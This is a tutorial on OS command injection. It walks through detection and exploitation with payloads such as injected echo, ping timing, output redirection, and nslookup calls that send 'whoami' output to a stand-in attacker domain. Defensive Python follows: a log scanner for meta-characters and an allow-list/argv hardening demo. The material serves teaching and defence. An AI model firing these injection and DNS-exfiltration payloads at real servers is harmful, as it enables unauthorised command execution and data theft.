OS Command Injection
This article explains what OS command injection is, how it can be detected and exploited on both Linux and Windows systems, demonstrates common payloads and techniques—including blind and out‑of‑band methods—and provides best‑practice defenses to prevent such vulnerabilities.
In this section we explain what OS command injection is, describe how to detect and exploit the vulnerability, list useful commands and techniques for different operating systems, and summarize how to prevent OS command injection.
What is OS Command Injection
OS command injection (also called shell injection) is a web security flaw that allows an attacker to execute arbitrary operating‑system commands on the server hosting the application, potentially causing severe damage to the application, its data, and other systems in the infrastructure.
Arbitrary Command Execution
Assume a shopping application lets a user check product stock via a URL such as:
https://insecure-website.com/stockStatus?productID=381&storeID=29
The application queries legacy systems by invoking a shell command:
stockreport.pl 381 29
If the application does not defend against OS command injection, an attacker can supply input like:
& echo aiwefwlguh &
When used as the productID parameter, the executed command becomes:
stockreport.pl & echo aiwefwlguh & 29
The echo command simply prints the supplied string, while the & symbol is a shell command separator, so the shell runs three separate commands. The resulting output is:
Error - productID was not provided
aiwefwlguh
29: command not found
This demonstrates how the original command fails (it now runs with no arguments), the injected echo succeeds, and the trailing parameter 29 is interpreted as a command name.
Common Commands
When identifying an OS command injection, initial commands to gather system information are useful. Below is a summary of common commands on Linux and Windows:
Purpose                     Linux         Windows
Show current user           whoami        whoami
Show OS information         uname -a      ver
Show network configuration  ifconfig      ipconfig /all
Show network connections    netstat -an   netstat -an
Show running processes      ps -ef        tasklist
Blind OS Command Injection
Many OS command injection flaws are blind (sometimes called invisible), meaning the application does not return the command's output in its HTTP response. They can still be detected and exploited using the alternative techniques below.
For example, a feedback form that sends an email via the mail command does not expose the command’s output, so an echo payload would be ineffective. Instead, other detection methods are needed.
Timing‑Based Detection
Inject a command that induces a measurable delay and time the response. Using ping is effective because the number of echo requests, and therefore the run time, can be controlled:
& ping -c 10 127.0.0.1 &
This command pings the loopback address ten times, taking about 10 seconds; a response delayed by roughly that much indicates the injected command ran.
Redirecting Output
Redirect the output of an injected command into a web-accessible directory. If the application serves files from /var/www/static, an attacker can send:
& whoami > /var/www/static/whoami.txt &
The > symbol redirects the output of whoami into whoami.txt, which can then be retrieved with a browser at https://vulnerable-website.com/whoami.txt.
Using OAST (Out‑of‑Band Application Security Testing)
With OAST, an attacker controls an external system and injects a command that contacts that system, so a successful injection can be detected even without any output in the response. Example payload:
& nslookup kgji2ohoyw.web-attacker.com &
The nslookup command performs a DNS lookup for a domain the attacker controls; observing the lookup on that domain's name server confirms execution.
Another technique embeds the result of a command in the DNS query:
& nslookup `whoami`.kgji2ohoyw.web-attacker.com &
This causes a lookup such as wwwuser.kgji2ohoyw.web-attacker.com, revealing the command's output in the queried name.
Methods for Injecting OS Commands
Various shell meta‑characters can be used to perform OS command injection. Common command separators that work on both Windows and Unix include:
&
&&
|
||
Unix‑only separators include:
;
newline (0x0a or \n)
Unix shells also allow backticks (`) and the dollar sign ($) for command substitution.
Different meta-characters behave slightly differently, affecting whether they can retrieve command output or only work for blind exploits.
If the attacker's input appears inside a quoted string, they must first terminate the quote with a matching " or ' before injecting additional commands.
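As an added example (not part of the original article), the detector below runs this section's meta-character list over a few constructed access-log lines, the way a defender might triage request logs for injection attempts; the log lines are constructed and reuse the payload shapes shown in this article, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Meta-characters from the list above: cross-platform separators, Unix-only
# separators, and the Unix command-substitution syntax.
SEPARATORS = ["&&", "||", "&", "|", ";", "\n"]
SUBSTITUTION = ["`", "$(", "${"]
# A quote immediately followed by a separator is the "break out of a quoted
# argument" pattern described above.
QUOTE_BREAK = re.compile(r'''["']\s*[&|;]''')

def flag_param(value):
    """Return the suspicious constructs found in one decoded parameter value."""
    found = [m for m in SEPARATORS + SUBSTITUTION if m in value]
    if QUOTE_BREAK.search(value):
        found.append("quote-break")
    return found

def scan_access_log(lines):
    """Return (param, decoded value, findings) for each suspicious parameter."""
    hits = []
    for line in lines:
        # The request line is the quoted "METHOD /path?query HTTP/x" field.
        m = re.search(r'"(?:GET|POST|PUT) (\S+) HTTP/', line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qsl splits on the literal '&' first, then percent-decodes,
        # so an encoded %26 inside a value survives as data to inspect.
        for name, value in parse_qsl(query, keep_blank_values=True):
            findings = flag_param(value)
            if findings:
                hits.append((name, value, findings))
    return hits

# Constructed sample access-log lines (not from a real server), reusing the
# payload shapes shown in this article.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /stockStatus?productID=381&storeID=29 HTTP/1.1" 200 51',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /stockStatus?productID=%26%20echo%20aiwefwlguh%20%26&storeID=29 HTTP/1.1" 500 80',
    '10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /stockStatus?productID=1%3B%20ping%20-c%2010%20127.0.0.1&storeID=29 HTTP/1.1" 200 51',
    '10.0.0.9 - - [01/Jan/2024:10:00:12 +0000] "GET /stockStatus?productID=%60whoami%60&storeID=29 HTTP/1.1" 200 51',
    '10.0.0.9 - - [01/Jan/2024:10:00:15 +0000] "GET /stockStatus?productID=381%22%20%26%20whoami&storeID=29 HTTP/1.1" 200 51',
]

if __name__ == "__main__":
    for name, value, findings in scan_access_log(SAMPLE_LOG):
        print(f"{name}={value!r} -> {findings}")
```

The decoded values matter: the second line's %26 is only visible as a separator after percent-decoding, which is why the check runs on parse_qsl output rather than on the raw query string.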
Defending Against OS Command Injection
The most effective mitigation is to avoid invoking OS commands from application code altogether, preferring safer platform APIs.
If calling OS commands with user input is unavoidable, strict input validation is required, such as:
Whitelist validation against allowed values.
Ensuring the input is numeric when appropriate.
Allowing only alphanumeric characters without special syntax or spaces.
Do not rely on escaping shell meta‑characters; this approach is error‑prone and can be bypassed by skilled attackers.
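As an added example, not code from the original article, the snippet below contrasts the vulnerable shell-string pattern behind the stockreport.pl call with the hardened approach described above (numeric allow-list plus an argv list with shell=False). It assumes a Python back end; run_without_shell is a hypothetical helper that demonstrates the argv boundary using the Python interpreter itself as the child process.

```python
import re
import subprocess
import sys

# Constructed example of the stock-check call from this article, assuming a
# Python back end that launches stockreport.pl with subprocess.

def build_command_unsafe(product_id, store_id):
    """Vulnerable pattern: user input is spliced into one command string that
    would be handed to subprocess.run(..., shell=True). The shell then treats
    &, ;, | and similar characters inside the input as separators."""
    return f"stockreport.pl {product_id} {store_id}"

# Allow-list: a product or store identifier is 1 to 10 decimal digits, nothing else.
ID_PATTERN = re.compile(r"[0-9]{1,10}")

def is_valid_id(value):
    """True only if the whole value matches the allow-list pattern."""
    return ID_PATTERN.fullmatch(value) is not None

def build_command_safe(product_id, store_id):
    """Hardened pattern: validate every field, then build an argv list for
    subprocess.run(argv) with shell=False, so each element reaches
    stockreport.pl as a single argument and no shell parses it."""
    for value in (product_id, store_id):
        if not is_valid_id(value):
            raise ValueError(f"rejected identifier: {value!r}")
    return ["stockreport.pl", product_id, store_id]

def run_without_shell(value):
    """Show the argv boundary directly: pass value as ONE argument to a child
    process and return what the child saw. The child is this same Python
    interpreter so the demo runs anywhere; no shell is involved."""
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", value],
        capture_output=True, text=True, check=True)
    return result.stdout.rstrip("\n")

if __name__ == "__main__":
    payload = "& echo aiwefwlguh &"
    print("unsafe string:", build_command_unsafe(payload, "29"))
    print("safe argv:    ", build_command_safe("381", "29"))
    print("child saw:    ", run_without_shell(payload))
    try:
        build_command_safe(payload, "29")
    except ValueError as exc:
        print("validation:   ", exc)
```

Even without the allow-list, the argv form alone would deliver the payload to stockreport.pl as a literal string rather than as separate commands; the validation step is the second layer that rejects it outright.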
System Architect Go